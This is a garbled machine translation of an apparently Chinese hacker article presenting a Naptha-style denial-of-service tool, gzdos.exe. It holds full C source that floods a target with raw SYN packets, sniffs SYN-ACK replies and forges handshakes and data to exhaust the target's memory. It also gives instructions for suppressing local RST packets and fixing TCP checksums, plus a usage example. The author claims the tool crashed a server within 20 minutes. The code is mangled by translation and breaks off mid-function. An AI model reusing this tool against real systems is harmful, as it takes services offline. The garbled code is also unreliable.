Test platform VC 6.0 Windows2000 Server Target Platform Windows 2000, Windows XP Surprise, is inspired by Naptha attack, I hope to extend this fake connection to personal PC, and is not subject to this conditional factor limits. I took time to study the things written below, I am not nonsense. Now take it out and everyone Share, it is not very mature, I hope to discuss with you. About NAPTHA has written a NaPTHA in 2000. Why use a local area network, just to be better hidden? There is also a more important factor to avoid your host's packets that have a second handshake from the remote host, prevent the system from emitting the RST package disconnects from the forged connection. In addition, there is no much impact on the Windows system for NAPTHA. How much memory consumes Windows. If the counter is refereated, the data is transferred again. A is an attacker C attacker: a SYN --------> CA SYN, ACK <---- CA ACK --------> CA Send Data -----> CA ACK <------ CA Send Data -----> CA ACK <-------- C ... Test Result: For a general temporary port, it is more effective for 1025 ports. It is quite effective. Memory continues to rise Finally, the computer can cause a computer because there is no response, and the crash. 20 minutes can drag a web bar server. For the maximum number of 80 ports, the effect is not very obvious, and the 40M memory is consumed to be repeated, leaving a large amount of Fin_Wait_1 status and ESTABLISHED state. For some other ports are quite inconvenient due to environmental finite testing. Convenient friends can tell me your test results. Welcome to discuss. So the problem to be solved below has 2: 1.Hook dropped the RST packet of this machine to refer to flashsky boss DIS filter hook driver to implement IP package filter "http://www.xfocus.net/articles / 200210/457.html is just the modification of a line of code. Modify IF (Packet [13] == 0x2 && sendInterFaceIndEx == invalid_pf_if_IF_INDEX) to IF (Packet [13] == 0x4 && SendinterFaceIndex! = InvalID_PF_IF_Index) See the original text. Original text is very detailed. 2. Forfielding the transmission via the Sniffer analysis, you must believe that the counterfeit connection is also added in the SYN package, and negotiates the size of the data packets that can be received. Otherwise, even if the other party is established, the other party does not return to accept the data, that is, if you want to consume the other party, you can't. For a general SYN scan, the TCP header length is 20 when NaPTHA requests to connect, and it is not optional data. For example, I am in 2000 is 8 bytes, and my friend's 2000 is 12 bytes. Taking my machine as an example 8 bytes, the TCP header length is 28 bytes. TCP_HEAD.TH_LENRES = 0x70. There is also a place to point out that the value of the TCP header is calculated.
Ushort Checksum (ushort * buffer, int size) {unsigned long cksum = 0; while (size> 1) {cksum = * buffer ; size - = sizeof (ushort);} if (size) {cksum = * (uchar * ) Buffer;} CKSUM = (CKSUM >> 16) (CKSUM & 0xFFFF); CKSUM = (CKSUM >> 16); return (~ cksum);} If there is data in a 20-byte TCP header Behind the department, this and the Windows2000 system are not the same. It has a relationship after analysis and data length. If you say 20-byte IP headers, 20-bytes of TCP headers plus 2 bytes of data. If the calculated checksum with the checksum as TCP but 0x4523 0x4323 is calculated by the system so that: tcpHeader.th_sum = checksum ((USHORT *) szSendBuf, sizeof (psdHeader) sizeof (tcpHeader) dwSize); tcpHeader.th_sum = htons (NTOHS (TCPHEADER.TH_SUM) - (USHORT) DWSIZE); DWSIZE is the length of the data belt. Otherwise, the other party does not receive the forged packet. Then it is not possible to achieve the purpose of consuming the other party's memory. Here is the test code. Considering the effect of this procedure or a certain harm, it is not written in a very convenient test program, and it is necessary to manually snifer option bytes. Then enter the option byte below the command line. For example: gzdos.exe 192.168.248.128 1025 020405b401010402 1000 65534 gzdos.exe source code: #include "stdio.h" #include "winsock2.h" #include "windows.h" #include
#include "wchar.h" #pragma comment (lib, "ws2_32.lib") #define SIO_RCVALL _WSAIOW (IOC_VENDOR, 1) char * ATTACKIP = "192.168.248.128"; USHORT ATTACKPORT = 135; USHORT StartPort = 1; int SLEEPTIME = 2000; UCHAR * optbuf = NULL; // option byte char * psend = NULL; DWORD len = 0; USHORT optlen = 0; typedef struct ip_head {unsigned char h_verlen; unsigned char tos; unsigned short total_len; unsigned short ident; unsigned short frag_and_flags; unsigned char ttl; unsigned char proto; unsigned short checksum; unsigned int sourceIP; unsigned int destIP;} IPHEADER; typedef struct tcp_head {USHORT th_sport; USHORT th_dport; unsigned int th_seq; unsigned int th_ack; unsigned char th_lenres; unsigned char th_flag; USHORT th_win; USHORT th_sum; USHORT th_urp;} TCPHEADER; typedef struct tsd_hdr {unsigned long saddr; unsigned long daddr; char mbz; char ptcl; unsigned short tcpl;} PSDHEADER; typedef struct attack_obj {DWORD dwIP; USHORT uAttackPort [ 11]; struct attack_obj * next;} atobj; atobj * listattackobj = 0; b OOL InitStart (); DWORD GetHostIP (); USHORT checksum (USHORT * buffer, int size); DWORD WINAPI ThreadSynFlood (LPVOID lp); void SendData (DWORD SEQ, DWORD ACK, USHORT SPort, USHORT APort, DWORD SIP, DWORD AIP, char * pBuf, BOOL Isdata, DWORD dwSize); DWORD WINAPI ListeningFunc (LPVOID lpvoid); void Banner (); void debugip (DWORD dwip); void ConvertOpt (cHAR * pu); SOCKET sock = NULL; int main (int argc, Char * argv []) {banner (); psend = (char *) Malloc (800); Memset (psend, 0x38,799); psend [799] = 0; len = strlen (psend); if (Argc <5 ) {Printf ("INPUT Error! / N"); return -1;} atticip = strdup (argv [1]); attackport = ATOI (Argv [2]); char * OPTBUFTEMP =
(Char *) STRDUP (Argv [3]); Convertopt (OPTBUFTEMP); if (Argc == 5) Sleeptime = ATOI (Argv [4]); if (argc == 6) {Sleeptime = ATOI (Argv [4] ); Startport = ATOI (argv [5]);} char hostname [255] = {0}; if (INITSTART () == false Return -1; if (OptBuf! = Null) {INT i = 0; Struct Hostent * lp = null; gethostname (Hostname, 255); lp = gethostByname (HostName); while (lp-> h_addr_list [i]! = null; dWord dwip = 0; dwip = * (DWORD * ) lp-> h_addr_list [i ]; h = Createthread (Null, Null, ListeningFunc, (LPVOID) DWIP, NULL, NULL); if (h == null) {Printf ("CREATE LISTENINGFUNC THREAD FALSE! / N"); Return -1;} Sleep (500);} threadsynflood (null);} else return -1; sleep (5555555);} Bool initstart () {bool flag; int ntimeover; wsadata wsadata; if (WsaStartup (2, 2), & WSADATA)! = 0) {PrintF ("WSAStartup Error! / N"); Return False;} ListattackObj = (atobj *) Calloc (1, sizeof (atobj)); listttackobj-> dwip = inet_addr (attack) ListattackObj-> uattackport [0] = htons (attackport); ListattackObj-> uattackport [1] = 0; list = null; sock = null; if ((sock = socket (sock) == invalid_socket) {printf ("socket setup error! / N"); return false;} flag = True; IF (setsock, ipproto_ip, ip_hdrincl, (charg) == socket_error) {printf ("setsockopt ip_hdrincl error! / n"); Return False;} ntimeOver = 2000; if time (setsockopt (sock, SOL_SOCKET, SO_SNDTIMEO, (char *) & nTimeOver, sizeof (nTimeOver)) == SOCKET_ERROR) // set transmitted {printf ( "setsockopt SO_SNDTIMEO error / n!"); return FALSE;} return TRUE;
} DWORD WINAPI ThreadSynFlood (LPVOID lp) {ATOBJ * pAtObj = ListAttackObj; SOCKADDR_IN addr_in; IPHEADER ipHeader; TCPHEADER tcpHeader; PSDHEADER psdHeader; char szSendBuf [1024] = {0}; int i = 0; while (! PAtObj = NULL) { addr_in.sin_family = AF_INET; addr_in.sin_addr.S_un.S_addr = pAtObj-> dwIP; ipHeader.h_verlen = (4 << 4 | sizeof (ipHeader) / sizeof (unsigned long)); ipHeader.tos = 0; ipHeader.total_len = htons (sizeof (ipHeader) sizeof (tcpHeader) optlen); // IP total length ipHeader.ident = 1; ipHeader.frag_and_flags = 0x0040; ipHeader.ttl = 0x80; ipHeader.proto = IPPROTO_TCP; ipHeader.checksum = 0 ipHeader.Destip = Patobj-> dwip; ipheader.sourceip = gethostip (); tcpheader.th_ack = 0; tcpheader.th_lenres = (Optlen / 4 5) << 4; tcpheader.th_flag = 2; tcpheader.th_win = Htons (0x4470); tcpheader.th_urp = 0; tcpheader.th_seq = htonl (0x00198288); for (int L = startport; l <65535; l ) {INT K = 0; While (Patobj-> uattackport [k]! = 0 ) {TCPHEADER.TH_DPORT = Patobj-> uattackport [k ]; psdheader.daddr = ipheader.destip; psdheader.mbz = 0; psdheader.ptcl = ippr OTO_TCP; psdHeader.tcpl = htons (sizeof (tcpHeader)); int sendnum = 0; int optlentemp = optlen; tcpHeader.th_sport = htons (l); tcpHeader.th_sum = 0; psdHeader.saddr = ipHeader.sourceIP; memcpy (szSendBuf , & psdHeader, sizeof (psdHeader)); memcpy (szSendBuf sizeof (psdHeader), & tcpHeader, sizeof (tcpHeader)); memcpy (szSendBuf sizeof (psdHeader) sizeof (tcpHeader), optbuf, optlentemp); tcpHeader.th_sum = checksum ((USHORT *) SZSENDBUF, SIZEOF (PSDHeader) SizeOf (TCPHEADER) OPTLENTEMP); tcpheader.th_sum =
htons (ntohs (tcpHeader.th_sum) - (USHORT) optlentemp); memcpy (szSendBuf, & ipHeader, sizeof (ipHeader)); memcpy (szSendBuf sizeof (ipHeader), & tcpHeader, sizeof (tcpHeader)); memcpy (szSendBuf sizeof ( ipHeader) sizeof (tcpHeader), optbuf, optlentemp); int rect = sendto (sock, szSendBuf, sizeof (ipHeader) sizeof (tcpHeader) optlentemp, 0, (struct sockaddr *) & addr_in, sizeof (addr_in)); if (SendNum > 10) {sendnum = 0;} if (Rect == Socket_ERROR) {Printf ("Send Error!:% x / n", wsagetlasterror (); return false;} else printf ("send OK% D / n ", l);} // endwhile sleep (Sleeptime);} Patobj = Patobj-> Next;} return 0;} dword gethostip () {dword dwip = 0; int i = 0; strunt hostent * lp = null; Char hostname [255] = {0}; gethostname (Hostname, 255); lp = gethostByname (Hostname); while (lp-> h_addr_list [i]! = null) i ; dwip = * (dword *) lp-> h_addr_list [--i]; Return dwip;} ushort checksum (ushort * buffer, int size) {unsigned long cksum = 0; while (size> 1) {CKSUM = * buffer ; size - = sizeof (ushort);} if Size) {CKSUM = * (Uchar *) Buffer;} CKSUM = (CKSUM >> 16) (CKSUM & 0xFFFF); CKSUM = (CKSUM >> 16); return (~ cksum);} DWORD WINAPI LISTENINGFUNC (LPVOID LPVOID) {Socket Rawsock; SockAddr_in addr_in = {0}; if ((rawsock = socket (AF_INET, SOCK_RAW, IPPROTO_IP)) == INVALID_SOCKET) {printf ( "Sniffer Socket Setup Error / n!"); return false;} addr_in.sin_family = AF_INET; addr_in. SIN_PORT = HTONS (8288); addr_in.sin_addr.s_un.s_addr = (dword) lpvoid; // Bind the RawSock Native IP and Port Int Ret = Bind (Rawsock, (Struct SockAddr *) & addr_in, sizeof (addr_in)) ;
IF (RET == Socket_ERROR) {Printf ("Bind False / N"); exit (0);} DWORD LPVBUFFER = 1; DWORD LPCBBYTESRETURNED = 0; WSAIOCTL (Rawsock, SiO_RCVALL, & LPVBuffer, Sizeof (LPVBuffer), NULL, 0 , & lpcbbytesreturned, null, null; while (true) {sockaddr_in from = {0}; int size = sizeof (from); char recvbuf [256] = {0}; // Receive data package RET = Recvfrom (Rawsock, Recvbuf , SizeOf (RECVBUF), 0, (Struct SockAddr *) & from, & size); if (RET! = Socket_ERROR) {// Analysis Packet IpHeader * LpipHeader; LpipHeader = (ipheader *) Recvbuf; if (lpipheader-> proto = = IPPROTO_TCP && lpIPheader-> sourceIP == inet_addr (ATTACKIP)) {TCPHEADER * lpTCPheader = (TCPHEADER *) (recvBuf sizeof (IPHEADER)); // open ports judgment is not returned by the remote packet if (lpTCPheader-> th_flag == 0x12) {IF (lptcpheader-> th_ack == htonl (0x00198289)) {// Forged 3rd Handshake sendData (lptcpheader-> th_ack, htonl (ntohl (lptcpheader-> th_seq) 1), / lptcpheader-> TH_DPORT, LPTCPHEADER-> TH_SPORT, LPPIPHEADER-> DESTIP, LPPHEADER-> SOURCEIP, NULL, FALSE, 0); // Proactive issued a data Senddata (lptcpheader-> th_ack, htonl (ntohl (lptcpheader-> th_seq) 1), / LPTCPHEADER-> TH_DPORT, lpTCPheader-> th_sport, lpIPheader-> destIP, lpIPheader-> sourceIP, psend, TRUE, len);}} else {if (lpTCPheader-> th_flag == 0x10) // continue sending data SendData (lpTCPheader-> th_ack, lpTCPheader- > th_seq, / lpTCPheader-> th_dport, lpTCPheader-> th_sport, lpIPheader-> destIP, lpIPheader-> sourceIP, psend, TRUE, len);}}}} // end while} void SendData (DWORD SEQ, DWORD ACK, USHORT SPort, USHORT APort, DWORD SIP, DWORD AIP, char * pBuf, BOOL Isdata, DWORD dwSize) {SOCKADDR_IN addr_in; IPHEADER ipHeader; TCPHEADER tcpHeader; PSDHEADER psdHeader; char szSendBuf [1024] = {0};
Addr_in.sin_family = afd_inet; addr_in.sin_port = Aport; addr_in.sin_addr.s_un.s_addr = aip; ipHeader.h_verlen = (4 << 4 | sizeof (ipheader) / sizeof (unsigned long); ipHeader.tos = 0; ipHeader.ident = 1; ipHeader.frag_and_flags = 0x0040; ipHeader.ttl = 0x80; ipHeader.proto = IPPROTO_TCP; ipHeader.checksum = 0; ipHeader.destIP = AIP; ipHeader.sourceIP = SIP; tcpHeader.th_dport = APort; tcpHeader. th_ack = ACK; tcpHeader.th_lenres = (sizeof (tcpHeader) / 4 << 4 | 0); tcpHeader.th_seq = SEQ; tcpHeader.th_win = htons (0x4470); tcpHeader.th_sport = SPort; ipHeader.total_len = htons (sizeof (ipHeader) sizeof (tcpHeader) dwSize);! if (Isdata) {tcpHeader.th_flag = 0x10;} // ack else {tcpHeader.th_flag = 0x18;} tcpHeader.th_urp = 0; psdHeader.daddr = ipHeader.destIP ; psdHeader.mbz = 0; psdHeader.ptcl = IPPROTO_TCP; psdHeader.tcpl = htons (sizeof (tcpHeader)); tcpHeader.th_sum = 0; psdHeader.saddr = ipHeader.sourceIP; memcpy (szSendBuf, & psdHeader, sizeof (psdHeader)) Memcpy (SzsendBuf Sizeof (Psdheader), & Tcpheader, Sizeof (TCPHEADER)); if (PBUF! = null) {Memcpy (szSendBuf sizeof (psdHeader) sizeof (tcpHeader), pBuf, dwSize); tcpHeader.th_sum = checksum ((USHORT *) szSendBuf, sizeof (psdHeader) sizeof (tcpHeader) dwSize); tcpHeader.th_sum = htons (ntohs (tcpHeader.th_sum) - (USHORT) dwSize);} else {tcpHeader.th_sum = checksum ((USHORT *) szSendBuf, sizeof (psdHeader) sizeof (tcpHeader));} memcpy (szSendBuf, & ipHeader, sizeof (ipHeader )); Memcpy (IpsendBuf sizeof (ipheader), & tcpheader, sizeof (tcpheader)); int REC = 0; if (PBUF == Null) Rect = Sendto (Sock, SzsendBuf, Sizeof (Ipheader)
sizeof (tcpHeader), 0, (struct sockaddr *) & addr_in, sizeof (addr_in)); else {memcpy (szSendBuf sizeof (ipHeader) sizeof (tcpHeader), pBuf, dwSize); rect = sendto (sock, szSendBuf, sizeof (ipHeader) SizeOf (TCPHEADER) DWSIZE, 0, (STRUCKADDR *) & addr_in, sizeof (addr_in));} f (Rect == Socket_ERROR) {Printf ("Send Error!:% X / N", Wsagetlasterror )));} else {if (PBUF! = NULL) Printf ("SendData OK% D / N", NTOHS (Sport); Else Printf ("Sendack OK% D / N", NTOHS (Sport); }} void banner () {printf ("****************************************************************************************************************************************************************************************************************************************************************************** ************ / n "); Printf (" Dog Dos Test / N "); Printf (" Maker By LionD8. QQ: 10415468. Email: liond8@eyou.com/n ") Printf ("Welcome to my Website: http://liond8.126.com/N"); Printf ("for authorized testing, otherwise it can cause any legal dispute to self-contained advice / N"); Printf ("*** ********************************************************* / n "); Printf (" gzdos.exe / n ");} Void debugip (dWord dwip) {struct in_addr a = {0}; A.S_UN.S_ADDR = dwip; Printf ("% s ", inet_ntoa (a) ); void communication (char * pu) {INT i = 0, LENTEMP; LENTEMP = Strlen (PU ); Optlen = LENTEMP / 2; OPTBUF = (uchar *) Malloc (Optlen); INT K = 0; for (i = 0; I
